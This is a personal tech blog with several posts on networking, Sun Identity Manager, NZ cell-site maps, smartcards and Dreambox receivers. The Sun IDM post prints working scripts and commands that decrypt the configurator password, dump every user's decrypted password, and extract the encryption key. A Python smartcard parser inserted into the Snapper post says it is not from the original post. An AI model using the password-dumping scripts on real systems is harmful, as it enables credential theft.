Akamai IP Reputation Filter

Posted: 31-May-2018 11:53

So today I had an interesting issue where I was unable to access a web site from a customer's internet connection.

It seems that Akamai IP Reputation Filter has for some reason decided that the reputation of this IP address has some random issue that will prevent me from accessing their web site.

The sites I can't access include:

www.jbhifi.co.nz

shop.countdown.co.nz

When I attempt to access the sites I get:

------

Access Denied

You don't have permission to access "http://www.jbhifi.co.nz/" on this server.

Reference #18.67ff6dcb.1527719015.a6cebb8

------

At no point in the above do you have any idea this is related to Akamai Web Application Firewall blocking you. There are a number of not particularly helpful posts on the Akamai community talking about the issue.

https://community.akamai.com/customers/s/article/Why-is-Akamai-blocking-me?language=en_US

https://community.akamai.com/customers/s/question/0D50f00005RtpciCAB/cannot-access-any-akamai-hosted-sites?language=en_US

https://community.akamai.com/customers/s/question/0D50f00005RtpdLCAR/ip-address-blocked?language=en_US

And none of them provide any real resolution apart from contacting the site you are trying to access and then they can contact Akamai and figure out why.

So after lengthy conversations it turns out the only way to resolve the issue is to send an email to "support at akamai.com" and then hopefully get to the bottom of why you are blocked.

My first email consisted of:

------

Akamai does not block users from accessing our customers’ websites. However, our customers can use tools and policies which may in turn block you (the end user). Our customers use these rules to protect them and you from malicious actors on the internet.

We have checked the logs you provided and have found you are being blocked because of a Web Application Firewall rule being triggered by your IP address. The most likely reason that a company or an end user may be blocked from several sites is due to Reputation-based blocking.  Billions of IP addresses interact with the Akamai Intelligent Platform every month, and the Client Reputation module provides information regarding the reputation of each of them. Customers with this module enabled can block IP addresses whose reputation exceeds a certain configurable threshold.

Some other reasons that a block may be happening are:

Explicit IP blocking / blacklisting

Location-based blacklisting

Rule-based blocking (i.e. web application firewall protections)

HTTP request rate controls (e.g. DoS protections)

We cannot unblock your IP address as it is the Akamai clients who make up the rules to block certain customers. You can check directly with the website owners why your IP is being blocked if you feel you have not done any harm or any illegal activities on the site you are being blocked. 

Having said this, I have checked x.x.x.x and it's not being blocked.

------

So that's no use at all, as we are still blocked. When I finally manage to figure out how to unblock our IP address I will update this blog.



Bogon Filtering using Regex

Posted: 24-Jan-2018 13:16

I had to filter the Bogon ranges (RFC1918 + CGNAT (RFC6598) + Loopback (RFC990) + Link Local (RFC3927)) from within a proxy server I was setting up. RFC5735 covers a lot of the non-routable addresses all in a single RFC with the exception of CGNAT. I used this page as a start and tweaked it to my own requirements.

My regex testing site of preference is: https://regex101.com/ as it has an excellent UI to test with and breaks out what the regex is doing.

This is the regex I ended up with:

((?:10|127)(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3})|((?:192\.168|169\.254|172\.(?:1[6-9]|2[0-9]|3[0-1])|100\.(?:6[4-9]|[7-9][0-9]|1[0-1][0-9]|12[0-7]))(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2})

Reading it, the regex blocks the following ranges:

10.0.0.0/8 & 127.0.0.0/8

Regex: ((?:10|127)(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3})

Explanation: a non-capturing group (?:...) matches 10 or 127, then a second non-capturing group matches ". + 1-255" and is repeated {3} times.

 

192.168.0.0/16 & 169.254.0.0/16

Regex: ((?:192\.168|169\.254)(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2})

Explanation: a non-capturing group (?:...) matches 192.168 or 169.254, then a second non-capturing group matches ". + 1-255" and is repeated {2} times.

 

172.16.0.0/12

Regex: (172\.(?:1[6-9]|2[0-9]|3[0-1])(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2})

Explanation: "172." then a non-capturing group matching 16-19 or 20-29 or 30-31, then a second non-capturing group matches ". + 1-255" and is repeated {2} times.

 

100.64.0.0/10

Regex: (100\.(?:6[4-9]|[7-9][0-9]|1[0-1][0-9]|12[0-7])(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2})

Explanation: "100." then a non-capturing group matching 64-69 or 70-99 or 100-119 or 120-127, then a second non-capturing group matches ". + 1-255" and is repeated {2} times.

 

Hope someone finds this useful.



Extracting encrypted passwords from Sun Identity Manager

Posted: 2-Nov-2011 20:25

For my sins I am using Sun IDM. And I was somewhat disappointed at how easy it is to extract any password from Sun IDM without needing any authentication. As long as you have command line access to call the LH you can extract the configurator password. Here are a few links I found on this topic.

http://www.darkedges.com/blog/?p=7
http://zerointechnologies.com/sun-idm-decrypt-password.html

The second link includes the javascript code needed, but a session needs to be established first.  So this is the modified code I used.

/* Decrypt Sun IDM Passwords */
importPackage(Packages.com.waveset.util);
importPackage(Packages.com.waveset.server);
var _lhSession = new InternalSession();
print("Encrypted = " + arguments[0]);
var pwd = new EncryptedData();
pwd.fromString(arguments[0]);
print("Decrypted = " + pwd.decryptToString());
/* End */

Save the above script as pwd.js, then call it as shown below:

./lh js pwd.js "3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw=="
Encrypted = 3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw==
Decrypted = configurator


So... to get the encrypted password you want, a modified version of the JS to take an input file and return the passwords:

/* Decrypt Sun IDM Passwords */
importPackage(Packages.java.util);
importPackage(Packages.java.io);
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
importPackage(Packages.com.waveset.util);
var _lhSession = new InternalSession();
var file = new FileReader(arguments[0]);
var br = new BufferedReader(file);
var line;
while ((line = br.readLine()) != null) {
var obj = _lhSession.getObject(Type.USER, line);
var pwd = new EncryptedData();
pwd.fromString(obj.getAttribute("password"));
print(obj.getName() + "," + pwd.decryptToString());
}
/* End */

Plus I've now got the offline decryption working too by extracting out the encryption key:

$WSHOME/bin/lh console -c "getObject EncryptionKey *"

And the Misc data:

/* Extract Misc Data */
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
var _lhSession = new InternalSession();
var obj = _lhSession.getObject(Type.MISCELLANEOUS, "miscData");
print("Result" + obj.toXml());
/* End */

Then call the javascript:

$WSHOME/bin/lh js misc.js

Using the code shown above from Dark Edges.

Sad.. But true.




NZ Cell Site location information - Now with Google Fusion Tables!

Posted: 26-Aug-2011 13:00

Many of you may know that I have an existing blog entry with KML files you can download or load up in Google Earth here: http://www.geekzone.co.nz/BarTender/7403

So... Now thanks to Mark Hansen and the great work he did drawing all the links nationwide http://markhansen.co.nz/nz-wireless-map/

I've come to learn of Google Fusion Tables. Now the super cool thing about Fusion Tables is you can map data from a table in Fusion Tables directly into Google Maps and not have the annoying 1000 Placemark limit you have with KMLs plus sluggish response when loading a KML file into Google Maps.

With Google Fusion you can either map directly from within Fusion from your dataset, or write up a small web page and do some pretty stuff. I've got the web page so then I can add a Fusion Tables style in so all the place marks have a "T"/"V" etc depending on if it's a Telecom or Vodafone site.

Try V2 of The NZ Cell Information: http://dl.dropbox.com/u/22487235/fusion.html

If you look in the html it lists the Fusion Table data that I extracted out of RSM which can be found here: 1355049




NZ Cell Site Information

Posted: 26-Sep-2010 14:52

I have extracted the data out of the Radio Spectrum Management Database Spectrum Search Lite which is the Government agency who controls all radio frequencies in NZ. They kindly put up their whole database as an Access 97 DB free for download (Yay for Open Govt!). So this is the frequencies that the companies are allowed to transmit from, not necessarily an actual Cell Site. But more often than not it IS a cell site.
First I transferred the Access Database into a SQLite Database using mdb-sqlite. Then using a SQL Query and Saxon I manipulated the files into KML Files.

NEW UPDATE:

I've been playing around with Google Fusion thanks to Mark Hansen's great entry showing how he used the RSM data to get all the radio links: http://wirelessmap.markhansen.co.nz/

Now I have a Google Fusion site showing all sites.

Update: I've just added Carrier specific kml's with icons at each site saying what frequencies are transmitted from that site.

Update, this is a work in progress with updated data and displaying the data slightly differently.

RSM Database dump 20 June 2011

If you want a copy of the whole archive to create the KMLs from the RSM Database download just PM me and I will send you the link.

All Sites


All Cell Sites by Carrier:
This lists all Cell Sites broken down by carrier.  The Google Maps 1000 Feature Limit means that it won't load properly in anything other than Google Earth.
KML and Google Maps Link

This has just Telecom, Voda, 2Deg and Woosh, and all the frequencies on a per-site basis.  It still doesn't open very well in Google Maps due to the large number of Placemarks.
And a GPS with the Site Name - Provider and Location all in the Name string:
http://sites.google.com/site/nzcellinfo/forgps.kml or Google Maps Link

Telecom

All Telecom Sites: CDMA, XT850 and XT2100
KML or Google Maps Link

Telecom CDMA:
KML or Google Maps Link
Telecom XT 850 Mhz:
KML or Google Maps Link
Telecom XT 2100 Mhz:
KML or Google Maps Link

Vodafone

All Vodafone Sites: 900, 1800 and 2100
KML or Google Maps Link

Vodafone GSM 900:
KML or Google Maps Link
Vodafone GSM 1800:
KML or Google Maps Link
Vodafone WCDMA 2100:
KML or Google Maps Link

Note: I'm not sure which 900Mhz sites are 2G and which are 3G Extended.  This isn't registered in RSM since Vodafone own the frequency and can do what they like with it.

Two Degrees

All Two Degrees Sites: 900, 1800 and 2100
KML or Google Maps Link

Two Degrees GSM 900:
KML or Google Maps Link
Two Degrees GSM 1800:
KML or Google Maps Link
Two Degrees WCDMA 2100:
KML or Google Maps Link

Custom Two Degrees Maps

And New Cell Site Locations (that only have microwave backhaul so far).

KML or Google Maps Link

And All 2D Locations across the country.

KML or Google Maps Link



Woosh

Woosh TD-CDMA 2067.5:
KML or Google Maps Link

Any other mobile networks I should add, just PM me.

Feel free to redistribute in any format you want, as this is public information from RSM anyway.



Fun with Snapper - Take 1

Posted: 20-Jul-2009 08:15

After getting a Snapper USB I thought I would look into what it's all about a bit more, and see if I can see what's going on and look into the card using Linux.

Firstly it took a while to figure out where to find the USB Driver software, as the Snapper site isn't exactly obvious on where you download it from:

http://www.snapper.co.nz/setup <- The main start page
https://www.snapper.co.nz/setup/step/1 <- Download the ActiveX control
https://www.snapper.co.nz/setup/step/2 <- Download either the USB or Snapper Feeder driver

Or direct links:

https://www.snapper.co.nz/global/plugin/driver_exe/Snapper_Feeder_Driver_Setup.exe
https://www.snapper.co.nz/global/plugin/driver_exe/Snapper_USB_Driver_Setup.exe

https://www.snapper.co.nz/setup/step/3 <- Phone home to see if it all works.

Ok, so you can start off with getting the ActiveX control installed, this is why you need IE (ugh).

Then after I had the drivers installed I found out it's a Smartcard, in fact it's a JCOP 3.1 card as per its ATR. Using standard smartcard interrogation tools, I found the ATR for the USB is: "3B 69 00 FF 4A 43 4F 50 33 31 56 32 32" which means it's a JCOP 31 v22 72K as per: http://ludovic.rousseau.free.fr/softwares/pcsc-tools/smartcard_list.txt

Ok, so it's a pretty secure card, banking quality so doing anything untoward is pretty much out.

Now on to see if I can get GPShell working with it: http://sourceforge.net/projects/globalplatform/ ... Watch this space.
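Decoding the ATR quoted above by hand shows where the JCOP identification comes from: the historical bytes are plain ASCII. This is an added example, not code from the original post; `parse_atr` is a hypothetical helper that follows the ISO/IEC 7816-3 ATR layout.

```python
def parse_atr(hex_string):
    """Split an ISO/IEC 7816-3 ATR into interface and historical bytes."""
    data = bytes.fromhex(hex_string)
    if len(data) < 2 or data[0] not in (0x3B, 0x3F):
        raise ValueError("not an ATR: missing or bad TS byte")
    t0 = data[1]
    hist_len = t0 & 0x0F      # low nibble K: number of historical bytes
    present = t0 >> 4         # high nibble Y1: which of TA1..TD1 follow
    pos, level = 2, 1
    interface, protocols = {}, set()
    try:
        while True:
            for bit, name in ((1, "TA"), (2, "TB"), (4, "TC")):
                if present & bit:
                    interface[f"{name}{level}"] = data[pos]
                    pos += 1
            if not present & 8:           # no TDi, so no further level
                break
            td = data[pos]
            pos += 1
            interface[f"TD{level}"] = td
            protocols.add(td & 0x0F)      # protocol announced by this TDi
            present = td >> 4
            level += 1
        historical = data[pos:pos + hist_len]
        if len(historical) != hist_len:
            raise ValueError("truncated ATR: historical bytes missing")
        pos += hist_len
        tck = None
        if protocols - {0}:               # TCK only when T != 0 is offered
            tck = data[pos]
            check = 0
            for byte in data[1:pos + 1]:  # XOR of T0..TCK must be zero
                check ^= byte
            if check:
                raise ValueError("bad TCK checksum")
    except IndexError:
        raise ValueError("truncated ATR: interface bytes missing")
    return {
        "interface": interface,
        "protocols": sorted(protocols) or [0],  # T=0 is implied if no TD
        "historical": historical,
        "tck": tck,
    }


if __name__ == "__main__":
    atr = parse_atr("3B 69 00 FF 4A 43 4F 50 33 31 56 32 32")
    print(atr["interface"], atr["historical"].decode("ascii"))
```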



Gemini image blowing up Clone Dreamboxes

Posted: 19-Apr-2008 14:14

Just an FYI for you clone dreambox owners out there.

It seems that in an "Attack on the Clones" the Gemini team have released a kill switch after you have been running the image for a while as part of their 4.x (but especially 4.3 and 4.31) images that will brick your Clone DM500 to a point that you will never be able to get it back.

My recommendation is to run the PLi image, but for those looking at putting a Gemini image on your clone box ... just say no.



Daylight Savings in NZ

Posted: 2-Apr-2008 20:23

One problem you Kiwis may be having is that the DST Start & Stop times in all the Dreambox images (PLi & Gemini) are not correct, so you need a correct Timezone file.

I have posted an entry on the PLi site about this here: http://www.pli-images.org/forum/viewthread.php?forum_id=28&thread_id=5762

You need to download the zoneinfo.tgz, extract out the file "Auckland" and rename it to "localtime" then ftp it to /var/etc which is where the localtime with incorrect DST start and stop times is at. Then reboot your box by telnetting to the box and typing reboot.

Then you should be done and the timezone should be fine!



Changing MAC address

Posted: 4-Feb-2008 09:38

I was asked this and didn't know the answer, as the boxes I have had always have a unique MAC address, so it was never a problem... however it was pretty easy to change as detailed below:

Telnet to the DM, and type the following commands:

cd /var/etc
rm init
echo \#!/bin/sh >> init
echo ifconfig eth0 down >> init
echo ifconfig eth0 hw ether xx:xx:xx:xx:xx:xx >> init
echo ifconfig eth0 up >> init
chmod 755 init
reboot

You need to change the xx:xx:xx to the MAC address you want. Then the box will reboot... and the MAC address is changed. Easy!



Moteck Motor Setup on a Dreambox

Posted: 18-Jan-2008 13:44

After playing around for a while deeply confused why I couldn't get my newly purchased Moteck Satellite motor (ex trademe!) to correctly point to Optus D1 I figured out my problem.

I found on another site the following:

The file you need to modify is the /var/tuxbox/config/enigma/config file. The Diseqc 1.2 motor settings are in the line starting with 's:/elitedvb/DVB/config/lnbs/0/RotorTable'

Example Settings are:
s:/elitedvb/DVB/config/lnbs/0/RotorTable=-0300014-0220030-0180011-0150029.......

Yours may/will well be different but you get the idea..... The format is:
Entry "-0300014"
"-0300" = 030.0 West (Hispa)
"014" = stored position 14

or

+0192002
+0192 = 019.2 East
002 = stored position 2

Whenever I load a new image I select diseqc complex setup, untick the USALS setting, save and exit, then load captains settings, reboot.

So what I needed to do was change:

s:/elitedvb/DVB/config/lnbs/0/RotorTable=+1600000

As I had configured D1 (160.0 East) to Stored Position 0. So I needed to remove that and set it to:

s:/elitedvb/DVB/config/lnbs/0/RotorTable=

This then meant that the GotoXX was always used and hopefully (once the motor is up on my roof!) the motor will move to the right location for each satellite!

That took me ages to figure out!



BarTender's profile

Bar Tender
Wellington
New Zealand